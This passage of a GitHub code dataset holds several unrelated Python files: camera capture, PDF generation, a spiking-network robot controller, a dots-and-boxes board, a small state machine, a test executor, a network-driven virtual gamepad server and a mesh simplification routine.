\" + str(sdk.IsGrabNFinished(context)))\r\n\r\n frame_list = []\r\n # Now begin loop for the images\r\n #fname = r\"C:\\\\Users\\\\EPL User\\\\Desktop\\\\DRRP_HWP_Characterization\\\\Uncoated_JHK\\\\Calibrations\\\\Calibrations_Raw\\\\Cal_1400_Filter\\\\\"\r\n fname = r\"C:\\\\Users\\\\EPL User\\\\Desktop\\\\DRRP_HWP_Characterization\\\\Uncoated_JHK\\\\Uncoated_Raw\\\\Uncoated_1400_Filter\\\\\"\r\n\r\n for j in range(val+1):\r\n image16b = copy.deepcopy(sdk.GetRawImageAsNumpyArray(context, j))\r\n time.sleep(1.3*tint/1000)\r\n\r\n if j > 0:\r\n frame_list.append(image16b)\r\n \r\n frame_list = np.array(frame_list) \r\n hdu_new = fits.PrimaryHDU(frame_list)\r\n position1 = stage1.get_position()\r\n position2 = stage2.get_position() \r\n print('Position 1 is ' + str(position1) + ' and position 2 is ' + str(position2))\r\n hdu_new.writeto(fname+ \"DRRP_Uncoated_1400nm_\"+str(val_fps)+\"_\"+str(set_tint)+\"_\"+str(position1)+\".fits\", overwrite = True)\r\n print(\"Files saved to \" + str(fname))\r\n\r\n stage1.move_by(int(increment))\r\n stage1.wait_move()\r\n stage2.move_by(5*int(increment))\r\n stage2.wait_move()\r\n sdk.Stop(context)\r\n\r\n\r\nprint(\"Exiting SDK, Process Finished...\")\r\nsdk.Exit(context)\r\n","repo_name":"wcmelby/HWP_Characterizations","sub_path":"DRRP_Double_Rotate_and_Take_Image.py","file_name":"DRRP_Double_Rotate_and_Take_Image.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"41636277587","text":"from fpdf import FPDF\nimport sqlite3\nimport jinja2\nimport re\n\n# Define a subclass of FPDF with HTML support\nclass MyFPDF(FPDF):\n pass\n\n# Step 1: Query the database\nconn = sqlite3.connect('mydatabase.db')\ncursor = conn.cursor()\ncursor.execute('SELECT * FROM mytable')\ndata = cursor.fetchall()\n\n# Step 2: Load the jinja2 template from a file\nwith open('mytemplate.html') as f:\n template_string = f.read()\ntemplate = jinja2.Template(template_string)\n\n# Step 3: Render the jinja2 template\nhtml_string = template.render(data=data)\n\n# Step 4: Generate the PDF file\npdf = MyFPDF()\npdf.add_page()\n\n# Parse the HTML string and manually create a table in the PDF\npdf.set_font('Arial', '', 14)\npdf.cell(0, 10, 'My PDF', 0, 1)\npdf.ln(10)\npdf.set_font('Arial', '', 12)\n\n# Find all table rows in the HTML string using a regular expression\npattern = re.compile(r'(.*?)
', re.DOTALL)\nrows = pattern.findall(html_string)\n\n# Loop over the rows and create a table in the PDF\nfor row in rows:\n # Find all table cells in the row using another regular expression\n cell_pattern = re.compile(r'(.*?) | ', re.DOTALL)\n cells = cell_pattern.findall(row)\n for cell in cells:\n pdf.cell(60, 10, cell, 1)\n pdf.ln()\n\npdf.output('myoutput.pdf')\n","repo_name":"acarcastillo/Jinja","sub_path":"code_8.py","file_name":"code_8.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"39321061836","text":"#!/usr/bin/env python\n\n\nimport pyNN.nest as p\nfrom pyNN.random import NumpyRNG, RandomDistribution\nfrom pyNN.utility import Timer\nimport matplotlib.pyplot as plt\nimport pylab\nimport numpy as np\nfrom scipy import signal\n\n\nimport rospy\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Twist\n\ndef network():\n rospy.init_node('simple_network_node')\n rate = rospy.Rate(10) # 10hz\n #rospy.Subscriber(\"camera/image_processed\", Image, test_callback)\n #rospy.Subscriber(\"camera/rgb/image_raw\", Image, test_callback)\n rospy.Subscriber('camera/image_compressed', Image, test_callback)\n #rospy.Subscriber(\"/chatter\", String, callback)\n rospy.Subscriber(\"/test_image\", Image, test_callback)\n\n rospy.loginfo('starting---------------')\n rospy.spin()\n #while True:\n # rospy.loginfo_throttle(10, \"This message will print every 10 seconds\")\n\ndef gaussian_convolution(spikes,dt):\n #----------- works only after the simulation has run; not online!!!!!!!!\n kernel_size = 10\n gaussian_kernel = signal.gaussian(kernel_size, std=2)\n scaling_factor = 1/np.sum(gaussian_kernel)*1/dt\n gauss_rate = np.convolve(spikes,gaussian_kernel,mode='same')*scaling_factor\n mean_rate = np.mean(gauss_rate)\n return mean_rate\n\ndef test_callback(data_input):\n global message\n message = data_input.data\n rospy.loginfo('=====received data %r', message)\n\n msg_list = list(message)\n\n msg_list= [int(msg.encode('hex'),16) for msg in message]\n #\n #for i in\n #msg_list = int(message.encode('hex'),16)\n\n #print('============= Received image data.',message)\n rospy.loginfo('=====received data %r', msg_list[1])\n timer = Timer()\n dt = 0.1\n p.setup(timestep=dt) # 0.1ms\n\n\n #input = p.Population(1, p.SpikeSourceArray, {'spike_times': [[0,3,6]]}, label='input')\n\n n_input_neurons = len(msg_list) #/4\n rospy.loginfo('====length of input image %r', n_input_neurons)\n\n\n #====================================================================\n # defining the LSM\n\n input_neuron = p.Population(n_input_neurons, p.SpikeSourcePoisson, {'rate':msg_list})\n\n n = 200 # number of cells\n exc_ratio = 0.8 # ratio of excitatory neurons\n n_exc = int(round(n*0.8))\n n_inh = n-n_exc\n celltype = p.Izhikevich()\n exc_cells = p.Population(n_exc, celltype, label=\"Excitatory_Cells\")\n inh_cells = p.Population(n_inh, celltype, label=\"Inhibitory_Cells\")\n\n # initialize with a uniform random distributin\n # use seeding for reproducability\n rngseed = 98766987\n parallel_safe = True\n\n rng = NumpyRNG(seed=rngseed, parallel_safe=parallel_safe)\n\n unifDistr = RandomDistribution('uniform', (-75,-65), rng=rng)\n exc_cells.initialize(v=unifDistr)\n inh_cells.initialize(v=unifDistr)\n\n readout_neurons = p.Population(1, celltype, label=\"readout_neuron\")\n\n\n w_exc = 20. # parameter than can be changed\n w_inh = 80. 
# parameter than can be changed\n delay_inp = 1\n delay_exc = 1 # defines how long (ms) the synapse takes for transmission\n delay_inh = 1\n\n\n weight_distr_inp = RandomDistribution('uniform',(1,10),rng=rng)\n weight_distr_exc = RandomDistribution('normal', [w_exc, 1e-3], rng=rng)\n weight_distr_inh = RandomDistribution('normal', [w_inh, 1e-3], rng=rng)\n\n\n stat_syn_inp = p.StaticSynapse(weight =weight_distr_inp, delay=delay_inp)\n stat_syn_exc = p.StaticSynapse(weight =weight_distr_exc, delay=delay_exc)\n stat_syn_inh = p.StaticSynapse(weight =weight_distr_inh, delay=delay_inh)\n\n\n\n pconn = 0.01 # sparse connection probability within the reservoir\n input_conn = 0.3 # sparse connections from input to reservoir\n \n exc_conn = p.FixedProbabilityConnector(pconn, rng=rng)\n inh_conn = p.FixedProbabilityConnector(pconn, rng=rng)\n inp_conn = p.FixedProbabilityConnector(input_conn, rng=rng)\n rout_conn = p.AllToAllConnector()\n \n connections = {}\n connections['e2e'] = p.Projection(exc_cells, exc_cells, exc_conn,\n synapse_type=stat_syn_exc, receptor_type='excitatory')\n connections['e2i'] = p.Projection(exc_cells, inh_cells, exc_conn,\n synapse_type=stat_syn_exc,receptor_type='excitatory')\n connections['i2e'] = p.Projection(inh_cells, exc_cells, inh_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n connections['i2i'] = p.Projection(inh_cells, inh_cells, inh_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n\n\n connections['inp2e'] = p.Projection(input_neuron, exc_cells, inp_conn,\n synapse_type=stat_syn_inp,receptor_type='excitatory')\n connections['inp2i'] = p.Projection(input_neuron, inh_cells, inp_conn,\n synapse_type=stat_syn_inp,receptor_type='excitatory')\n\n connections['e2rout'] = p.Projection(exc_cells, readout_neurons, rout_conn,\n synapse_type=stat_syn_exc,receptor_type='excitatory')\n connections['i2rout'] = p.Projection(inh_cells, readout_neurons, rout_conn,\n synapse_type=stat_syn_inh,receptor_type='inhibitory')\n\n\n #=====================================================================\n # recording and running the network\n\n readout_neurons.record(['v','spikes'])\n p.run(20)\n readout_data= readout_neurons.get_data()\n\n spikes = readout_data.segments[0].spiketrains[0]\n mean_rate = int(gaussian_convolution(spikes,dt))\n rospy.loginfo('=====mean_rate %r', mean_rate) # mean_rate = 64\n rate_command = mean_rate\n # rate coding of the spike train\n\n pub = rospy.Publisher('/cmd_vel_mux/input/teleop', Twist, queue_size=10)\n\n #======================================================================\n # construct the output command\n # we handcrafted the transfer function to be within the joint limits of the robot\n\n command = Twist()\n command.linear.x = np.abs((int(mean_rate)%10-4))*10+0.24 #0.24\n command.angular.z = -(int(mean_rate)%10-4.5)*10\n\t#int(mean_rate)%100/100.*np.pi-np.pi/2\n pub.publish(command)\n\n rospy.loginfo('=====send command %r', command.angular.y)\n\n\n fig_settings = {\n 'lines.linewidth': 0.5,\n 'axes.linewidth': 0.5,\n 'axes.labelsize': 'small',\n 'legend.fontsize': 'small',\n 'font.size': 8\n }\n plt.rcParams.update(fig_settings)\n fig1=plt.figure(1, figsize=(6,8))\n\n def plot_spiketrains(segment):\n for spiketrain in segment.spiketrains:\n y = np.ones_like(spiketrain) * spiketrain.annotations['source_id']\n plt.plot(spiketrain, y, '.')\n plt.ylabel(segment.name)\n plt.setp(plt.gca().get_xticklabels(), visible=False)\n\n def plot_signal(signal, index, colour='b'):\n label = \"Neuron %d\" % 
signal.annotations['source_ids'][index]\n plt.plot(signal.times, signal[:, index], colour, label=label)\n plt.ylabel(\"%s (%s)\" % (signal.name, signal.units._dimensionality.string))\n plt.setp(plt.gca().get_xticklabels(), visible=False)\n plt.legend()\n\n print(\"now plotting the network---------------\")\n rospy.loginfo('--------now plotting---------------')\n n_panels = sum(a.shape[1] for a in readout_data.segments[0].analogsignalarrays) + 2\n plt.subplot(n_panels, 1, 1)\n plot_spiketrains(readout_data.segments[0])\n panel = 3\n for array in readout_data.segments[0].analogsignalarrays:\n for i in range(array.shape[1]):\n plt.subplot(n_panels, 1, panel)\n plot_signal(array, i, colour='bg'[panel%2])\n panel += 1\n plt.xlabel(\"time (%s)\" % array.times.units._dimensionality.string)\n plt.setp(plt.gca().get_xticklabels(), visible=True)#\n\n #plt.show()\n #fig1.show()\n #plt.savefig(\"~/Spiking-Neural-Networks-on-Robotino/network_output.jpg\")\n\n\n\nif __name__ == '__main__':\n try:\n network()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Erzcoder/Spiking-Neural-Networks-on-Robotino","sub_path":"src/neural_network/src/lsm_node.py","file_name":"lsm_node.py","file_ext":"py","file_size_in_byte":8058,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"}
+{"seq_id":"24239130481","text":"\"\"\" Nombre: Alejandro Tejada\nCurso: Inteligencia Artificial\nFecha: 28/05/2020\nPrograma: Tablero.py\nPropósito: dibujar el tablero y su lógica \"\"\"\n\n#zona de librerías\n#------------------------\nfrom random import *\n#--------------------------\n#la clase game se encarga de manejar loq ue sucede en el tablero\nclass Tablero: \n def __init__(self, Mat, dimX, dimY):\n self.Mat = Mat\n self.dimX = dimX\n self.dimY = dimY\n\n #se instancia el tablero con las dimensiones\n def Initiate(self): \n for i in range(0, self.dimY):\n R = []\n for j in range(0, self.dimX):\n if i % 2 == 1 and j % 2 == 1:\n #! se llena de valores random lo de adentro\n R.append(randint(1, 9))\n elif i % 2 == 0 and j % 2 == 0:\n #mprimiendo los asteriscos\n R.append('*')\n else:\n R.append(' ') # se agregan espacio\n self.Mat.append(R)\n\n def Get_matrix(self): # Matriz se obtiene\n ans = []\n for i in range(0, self.dimY):\n R = []\n for j in range(0, self.dimX):\n R.append(self.Mat[i][j])\n ans.append(R)\n return ans\n\n # se duibuja el tablero\n def Draw_mat(self): \n\n if self.dimX > 9:\n print(\" \", end='')\n print(\" \", end='')\n for i in range(0, self.dimX):\n print(str(i), end=' ')\n print()\n\n if self.dimX > 9:\n print(\" \", end='')\n print(\" \", end='')\n for i in range(0, self.dimX + 1):\n print(\"___\", end='')\n print()\n for j in range(self.dimY):\n if self.dimX > 9 and j < 10:\n print(\" \", end='')\n print(str(j) + \"| \", end='')\n for z in range(self.dimX):\n print(str(self.Mat[j][z]), end=' ')\n print()\n print(\" _________________________\\n\")\n\n def Get_currentState(self):\n return Tablero(self.Get_matrix(), self.dimX, self.dimY)\n\n #se aplican las acciones al tablero\n def action(self, i, j): \n Sum = 0\n\n if j % 2 == 0 and i % 2 == 1:\n self.Mat[j][i] = '-'\n if j < self.dimY - 1:\n if self.Mat[j+2][i] == '-' and self.Mat[j+1][i+1] == '|' and self.Mat[j+1][i-1] == '|':\n Sum += self.Mat[j+1][i]\n if j > 0:\n if self.Mat[j-2][i] == '-' and self.Mat[j-1][i+1] == '|' and self.Mat[j-1][i-1] == '|':\n Sum += self.Mat[j-1][i]\n\n else:\n self.Mat[j][i] = '|'\n if i < self.dimX - 1:\n if self.Mat[j][i+2] == '|' and self.Mat[j+1][i+1] == '-' and self.Mat[j-1][i+1] == '-':\n Sum += self.Mat[j][i+1]\n if i > 0:\n if self.Mat[j][i-2] == '|' and self.Mat[j+1][i-1] == '-' and self.Mat[j-1][i-1] == '-':\n Sum += self.Mat[j][i-1]\n return Sum\n","repo_name":"tej17584/Dots-and-Boxes-AI-Python","sub_path":"Tablero.py","file_name":"Tablero.py","file_ext":"py","file_size_in_byte":3005,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"74692340206","text":" ###########################################################\n # Computer Project #4\n #\n # Main Function\n # Display opening message\n # call 2 functions (Get character, Find state)\n # call Function 1 (Get character) \n # input a character that meets correct length\n # call Function 2 (Find state)\n # determine state based on character\n # loop while character is not empty string\n # display message if whether user is or is not laughing\n ###########################################################\n\n\ndef get_ch():\n \"\"\"\n Takes a character as input and tries again if the input is invalid\n \"\"\"\n user_input = input('Enter a character or press the Return key to finish: ')\n if len(user_input) > 1:\n print ('Invalid input, please try again.')\n return 'invalid'\n\n else:\n return user_input\n\n\ndef find_state(state, ch):\n \n \"\"\"\n Determines and assigns state of character based on character entered and\n state = 5 if chracter is invalid.\n \"\"\"\n # state 5 is an invalid entry\n \n if state == '1':\n if ch == 'h':\n state = '2'\n else:\n state = '5'\n \n \n elif state == '2':\n if ch == 'a' or ch == 'o':\n state = '3'\n else:\n state = '5'\n \n \n elif state == '3':\n if ch == '!':\n state = '4'\n \n elif ch == 'h':\n state = '2'\n \n elif ch == 'a' or ch == 'o':\n state = '3'\n \n else:\n state = '5'\n \n elif state == '4':\n if ch != '':\n state = '5'\n else:\n state = '4'\n \n \n return state\n \n\ndef main():\n \"\"\"\n Calls get_ch function and find_state function. Loops while character is\n not invalid. Displays whether user is or is not laughing based on state.\n \"\"\"\n state = '1'\n #user will always begin with state 1\n final_ch = ''\n #final_ch begins with empty string to keep track of characters \n ch = 'a'\n print ('I can recognize if you are laughing or not.')\n print('Please enter one character at a time.\\n')\n # Opening message \n while ch != '': \n ch = get_ch()\n if ch != 'invalid':\n state = find_state(state, ch)\n ch = str(ch)\n final_ch += ch\n #loop while character does not equal empty string\n \n \n if state == '4':\n print( \"You entered \", final_ch)\n print('You are laughing.')\n \n if state == '5':\n print (\"You entered \", final_ch)\n print('You are not laughing.')\n\nmain()","repo_name":"tialeefowlkes/python-project","sub_path":"proj04.py","file_name":"proj04.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"4568607517","text":"# 파일 출력 및 corpus, s_corpus 저장\ndef open_file(corpus, s_corpus, origin_corpus):\n\tf = open(\"../file/sample-sequence.txt\", \"r\")\n\n\twhile True:\n\t\tstate = f.readline()\n\t\tif not state:\n\t\t\tbreak\n\t\tstate = state.strip()\n\t\torigin_corpus.append(state)\n\t\tif state not in corpus:\n\t\t\tcorpus.append(state)\n\t\t\tstate_split = state.split(\"_\")\n\t\t\tfor i in state_split:\n\t\t\t\tif i not in s_corpus:\n\t\t\t\t\ts_corpus.append(i)\n\n\treturn corpus, s_corpus, origin_corpus\n\ndef write_file(result):\n\tf = open(\"../file/result.prism\", 'w')\n\tf.write(result)\n\tf.close","repo_name":"josuhee/PrismModelChecker","sub_path":"src/io_file.py","file_name":"io_file.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"37385711837","text":"from logging_setup import LOGGER\nimport json\nimport copy\nimport argparse\nfrom layers.interface_layer import InterfaceHandler\n\n\nclass TestExecutor:\n def __init__(self):\n self.interface_manager = InterfaceHandler()\n self.args = self.parse_args()\n\n with open(\"configuration.json\") as f:\n self.configuration = json.load(f)\n self.tools = self.configuration[\"tools\"]\n\n @staticmethod\n def parse_args():\n LOGGER.info(\"Parse all args...\")\n arg_parser = argparse.ArgumentParser(description='Test Result Filter')\n\n arg_parser.add_argument('-tr', dest='tr_path',\n help='test results path',\n required=False)\n arg_parser.add_argument('-tc',\n dest='test_cases',\n help='test case list',\n required=False)\n\n args = arg_parser.parse_args()\n args = vars(args)\n return args\n\n def initialize_interface_layer(self):\n LOGGER.info(\"Initialize interface layer...\")\n for tool in self.configuration[\"tools\"]:\n module_import = __import__(\"modules.%s.a_%s\" % (tool, tool),\n fromlist=[\"Abstract%s\" % tool])\n # Get Class Object\n module_class = getattr(module_import,\n 'Abstract%s' % tool)\n # Set Class as attribute for self, in order to be accessible from here\n setattr(self, tool, module_class(self.configuration[tool],\n copy.deepcopy(self.args)))\n # Share Interface manager\n self.__getattribute__(tool).interface_manager = self.interface_manager\n # Collect Interfaces\n self.interface_manager.collect(tool_name=tool,\n object_type=self.__getattribute__(tool))\n\n def initialize_tool_set(self):\n \"\"\"\n Initialize all tools\n :return:\n \"\"\"\n LOGGER.info(\"Initialize all tools...\")\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"INIT\",\n tool_name=tool,\n args=self.args\n )\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"PREPARE\",\n tool_name=tool,\n args=self.args\n )\n\n def stop_tool_set(self):\n \"\"\"\n Stop all tools\n :return:\n \"\"\"\n LOGGER.info(\"Stop all tools...\")\n for tool in self.tools:\n self.interface_manager.call(\n method_name=\"STOP\",\n tool_name=tool,\n args=self.args\n )\n\n def keyword_read_dtc(self):\n \"\"\"\n Read DTC keyword\n :return:\n \"\"\"\n return self.interface_manager.call(method_name=\"dia.read_dtc\")\n\n def keyword_send_diagnostic_request(self):\n \"\"\"\n Send dia request DTC\n :return:\n \"\"\"\n return self.interface_manager.call(method_name=\"dia.diagnostic_request\")\n\n def run(self, tests: list):\n \"\"\"\n Runner which run all tests\n :param tests:\n :return:\n \"\"\"\n for test in tests:\n LOGGER.info(\"Start test case\")\n for step in test:\n keyword = getattr(self, f\"keyword_{step}\")\n keyword()\n LOGGER.info(\"Stop test case\")\n\n\nif __name__ == \"__main__\":\n te = TestExecutor()\n te.initialize_interface_layer()\n te.initialize_tool_set()\n te.run([[\"read_dtc\", \"send_diagnostic_request\"],\n [\"send_diagnostic_request\", \"read_dtc\"],\n [\"read_dtc\"]])\n te.stop_tool_set()\n","repo_name":"ValeriuMorari/DissertationExample","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"73289116845","text":"# Map function : map(function,sequence)\n# To run a function along a given list and print the results in list or tuple.\n\n# def mul(n):\n# return n*n\n\nmul=lambda n:n*n\nnum=(1,2,3,4)\nresult=map(mul,num) #map(function,sequence) - SYNDAX\nprint(list(result))\n\n# num1=[1,2,3,4]\n# num2=[5,6,7,8]\n# result=map(lambda x,y:x+y,num1,num2)\n# print(list(result))\n\nnum1=[1,2,3,4]\nnum2=[5,6,7,8]\nresult=map(lambda x,y:x+y,num1,num2)\nprint(list(result))\n\n# Print length of each string in list.\n\nfruits=['apple','orange','mango','banana','jackfruit']\nresult=map(len,fruits)\nprint(list(result))\n\n# Print each letters as a list.\n\nfruits=['apple','orange','mango','banana','jackfruit']\nresult=map(list,fruits)\nprint(list(result))\n\n\n# ::::::: Important ::::::::\n\n\n# Map\n# Filter\n\n# lst=[1,2,3,4,5]\n# newlst=map(lambda x:x*x,lst)\n# print(list(newlst))\n#\n# newlst1=filter(lambda x:x>2,lst)\n# print(list(newlst1))","repo_name":"AthulkrishnaKp/Python-Django","sub_path":"Module 2 Start/Functions/Map_Function.py","file_name":"Map_Function.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"21548675870","text":"from pynput.keyboard import Key, Controller\nfrom sanic import Sanic\nfrom sanic.response import empty, json,file,text,empty\nimport vgamepad as vg\nimport time\nimport threading\n\napp = Sanic(\"Joystick\")\nkeyboard = Controller()\n\ndata={\n \"x\":0,\n \"y\":0,\n \"z\":0,\n \"vx\":0,\n \"vy\":0,\n \"sl\":0,\n \"break\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_UP},\n \"parking\":{\"active\":False,\"ctrl\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_DOWN},\n \"landing gear\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_LEFT},\n \"lights\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_DPAD_RIGHT},\n \"simulation speed\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_START},\n \"extra 2\":{\"active\":False,\"key\":\"\"},\n \"extra 3\":{\"active\":False,\"key\":\"\"},\n \"extra 4\":{\"active\":False,\"key\":\"\"},\n \"flap up\":{\"active\":False,\"shift\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_LEFT_THUMB},\n \"flap down\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_RIGHT_THUMB},\n \"spoiler arm\":{\"active\":False,\"shift\":True,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_LEFT_SHOULDER},\n \"spoiler full\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_RIGHT_SHOULDER},\n # \"neutral\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_GUIDE}, #not\n \"reverse\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_A},\n \"next view\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_B},\n \"next seat\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_X},\n \"minus\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_Y},\n \"plus\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_BACK},\n \"reset\":{\"active\":False,\"key\":vg.XUSB_BUTTON.XUSB_GAMEPAD_GUIDE},\n \"running\":True\n}\n\n@app.post('/data')\nasync def manage_data(request):\n \n data[\"vx\"]=float(request.form[\"0\"][0])\n data[\"vy\"]=float(request.form[\"1\"][0])\n data[\"x\"]=float(request.form[\"2\"][0])\n data[\"y\"]=float(request.form[\"3\"][0])\n data[\"z\"]=float(request.form[\"4\"][0])\n data[\"sl\"]=float(request.form[\"5\"][0])\n\n keys=list(data.keys())[6:len(data)-1]\n i=6\n for key in keys:\n data[key][\"active\"]=request.form[str(i)][0]==\"True\"\n i+=1\n\n return json({})\n\n\n\n@app.route(\"/\")\nasync def test_sockets(request):\n return await file('./test.html')\n\n@app.get('/disconnect')\nasync def manage_disconnection(request):\n data[\"running\"]=False\n return json({})\n\n@app.get(\"/connect\")\nasync def manage_connect(request):\n data[\"running\"]=True\n controllerT=threading.Thread(target=runController)\n controllerT.start()\n return json({})\n\ndef runServer():\n app.run(host=\"0.0.0.0\",port=\"5000\",debug=False,access_log=False)\n\ndef runController():\n gamepad = vg.VX360Gamepad()\n while data[\"running\"]:\n gamepad.left_joystick_float(x_value_float=-data[\"x\"], y_value_float=data[\"z\"])\n gamepad.right_joystick_float(x_value_float=data[\"vx\"], y_value_float=-data[\"vy\"])\n \n gamepad.left_trigger_float(value_float=data[\"sl\"])\n gamepad.right_trigger_float(value_float=-data[\"sl\"]+1)\n\n keys=list(data.keys())[6:len(data)-1]\n for key in keys:\n if data[key][\"key\"]==\"\":\n continue\n if data[key][\"active\"]:\n gamepad.press_button(button=data[key][\"key\"])\n else:\n gamepad.release_button(button=data[key][\"key\"])\n \n gamepad.update()\n time.sleep(0.01)\n\nif __name__ == '__main__':\n 
runServer()\n","repo_name":"EdgarPozas/joystick-mobile","sub_path":"server-sanic/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"4113494670","text":"import torch\nimport numpy as np\nfrom .core import to_hom\nfrom .geometry_basic import get_edges, edge_contraction\n\ndef compute_incident_triangles(f):\n \"\"\"\n compute the incident triangles per vertex\n :param v: vertices of the mesh\n :param f: faces of the mesh\n :return: list of lists of incident triangles per vertex\n \"\"\"\n incident_triangles = [[] for _ in range(np.unique(f).shape[0])]\n for i, face in enumerate(f):\n for vertex in face:\n incident_triangles[vertex].append(i)\n return incident_triangles\n\ndef compute_quadtratic_surface(v, f):\n \"\"\"\n given a mesh, compute the quadratic surface coefficients per vertex in a tensor of size Vx4x4\n the per vertex quadratic surface is computed from the sum of quadtratic surfaces of incident faces to each vertex\n :param v: vertices of the mesh\n :param f: faces of the mesh\n :return: tensor of size Vx4x4 of quadtratic surface coefficients per vertex\n \"\"\"\n e1 = v[f[:, 1]] - v[f[:, 0]]\n e2 = v[f[:, 2]] - v[f[:, 0]]\n e1 = e1 / np.linalg.norm(e1, axis=-1)[: ,None]\n e2 = e2 / np.linalg.norm(e2, axis=-1)[: ,None]\n n = np.cross(e1, e2)\n n = n / np.linalg.norm(n, axis=-1)[: ,None]\n d = ((-v[f[:, 0]])[:, None, :] @ n[:, :, None]).squeeze()\n Qf = np.zeros((f.shape[0], 4, 4), dtype=np.float32)\n Qf[:, :3, :3] = n[:, :, None] @ n[:, None, :]\n Qf[:, -1, :-1] = d[:, None] * n\n Qf[:, :-1, -1] = Qf[:, -1, :-1]\n Qf[:, -1, -1] = d * d\n Qv = distribute_field(v, f, Qf)\n return Qv\n\ndef compute_contraction_costs(v_hats, valid_pairs, Qv):\n \"\"\"\n compute the costs of contracting the valid pairs\n :param v_hats: the new vertices after contraction\n :param valid_pairs: the valid pairs of vertices to contract\n :param Qv: the quadratic surface coefficients per v_hat\n :return: the costs of contracting the valid pairs\n \"\"\"\n v_hats = to_hom(v_hats)\n Q_hats = np.sum(Qv[valid_pairs], axis=1)\n return (v_hats[:, None, :] @ (Q_hats @ v_hats[:, :, None])).squeeze()\n\ndef compute_v_hats(v, valid_pairs, Qv):\n \"\"\"\n computes the optimal vertex positions for each valid pair of vertices given the quadratic surface coefficients of contracting the pairs\n :param v: vertices of the mesh\n :param valid_pairs: list of valid pairs of vertices\n :param Qv: tensor of size Vx4x4 of quadtratic surface coefficients per vertex\n :return: tensor of size Vx3 of (almost) optimal vertex positions\n \"\"\"\n v_hats = np.zeros((valid_pairs.shape[0], 3), dtype=np.float32)\n Q_hats = np.sum(Qv[valid_pairs], axis=1)\n Q_hats[:, -1, :] = np.array([0, 0, 0, 1])[None, :]\n mask = np.linalg.det(Q_hats) != 0\n v_hats[mask] = (np.linalg.inv(Q_hats[mask]) @ np.array([0, 0, 0, 1])[None, :, None]).squeeze()[:, :3] # d(cost)/d(v_hat) = 0\n # note: orig paper searches for the minimum along the segment between the two vertices if Q_hat is singular\n v_hats[~mask] = np.mean(v[valid_pairs[~mask]], axis=1) # if Q_hats is singular, use the mean of the two vertices\n return v_hats\n\ndef qem(v: np.ndarray, f: np.ndarray, budget: int):\n \"\"\"\n A slightly naive (and slow) implementation of \"Surface Simplification Using Quadric Error Metrics\", 1997\n \"\"\"\n if v.ndim != 2 or v.shape[-1] != 3:\n raise ValueError(\"v must be V x 3 array\")\n if f.ndim != 2 or f.shape[-1] != 3:\n raise ValueError(\"f must be F x 3 array\")\n if budget < 4:\n raise ValueError(\"minimum budget is 3 triangles\")\n while f.shape[0] > budget:\n print(\"current # faces: {}\".format(f.shape[0]))\n valid_pairs = get_edges(f)\n Qv = compute_quadtratic_surface(v, 
f)\n v_hats = compute_v_hats(v, valid_pairs, Qv)\n costs = compute_contraction_costs(v_hats, valid_pairs, Qv)\n lowest_cost = np.argmin(costs)\n v, f = edge_contraction(v, f, valid_pairs[lowest_cost], v_hats[lowest_cost])\n return v, f\n\ndef distribute_field(v, f, field, avg=False):\n \"\"\"\n given a mesh, and a field shaped (F, ...), distribute it to the vertices of the mesh by summing up the values of the incident faces\n :param v: vertices of the mesh (V, 3)\n :param f: faces of the mesh (F, 3)\n :param field: field of size (F, ...) dtype float32\n :param avg: if True, the field is averaged over the incident faces instead of summed up\n :return: the field distributed over the vertices (V, ...)\n \"\"\"\n if field.shape[0] != f.shape[0]:\n raise ValueError(\"field must have the same number of elements as faces\")\n if field.dtype != np.float32:\n raise ValueError(\"field must be of dtype float32\")\n # compute the incident triangles per vertex\n incident_triangles = compute_incident_triangles(f)\n # compute the scalar field per vertex\n field_per_vertex = np.zeros((v.shape[0], *field.shape[1:]), dtype=np.float32)\n for i, face in enumerate(f):\n for vertex in face:\n field_per_vertex[vertex] += field[i]\n if avg:\n n_incident_triangles = np.array([len(triangles) for triangles in incident_triangles])\n field_per_vertex /= n_incident_triangles[..., None]\n return 